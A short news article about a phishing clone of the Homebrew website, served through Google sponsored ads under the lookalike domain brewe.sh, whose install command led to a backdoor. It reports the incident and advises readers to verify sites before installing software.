Source: Ryan Chenkie
In a recent discovery, a phishing website targeting Homebrew, an open-source package manager for macOS, was found to be appearing in Google Search results. This incident highlights a critical flaw in Google’s ad system, raising concerns about the platform’s ability to effectively filter out malicious content.
⚠️ Developers, please be careful when installing Homebrew.
Google is serving sponsored links to a Homebrew site clone that has a cURL command to malware. The URL for this site is one letter different than the official site. pic.twitter.com/TTpWRfqGWo
— Ryan Chenkie (@ryanchenkie) January 18, 2025
The phishing website was designed to look identical to the official Homebrew website (brew.sh). However, when users clicked on the ad, they were redirected to a malicious website that contained installation code for a backdoor. This backdoor, if executed, could give attackers access to the user’s system and personal data.
It remains unclear how the phishing website was able to bypass Google’s ad system. Typically, Google requires domain verification before displaying ads, and past phishing attempts have often used non-Latin characters for obfuscation. In this case, the URL displayed as brew.sh seemed legitimate at first glance.
Upon closer inspection, it was revealed that the actual domain of the phishing website was brewe.sh, not brew.sh. This discrepancy between the displayed and actual URLs raises questions about how Google’s ad system allowed such a mismatch to pass its verification process.
The phishing attack could have had serious consequences for users who inadvertently ran the installation code. The backdoor could have given attackers access to their systems and personal data, potentially leading to financial loss, identity theft, or other cyberattacks.
Users are advised to be cautious when clicking on ads for software or other products. It is always a good idea to verify the authenticity of the website before clicking on any links or downloading any software.
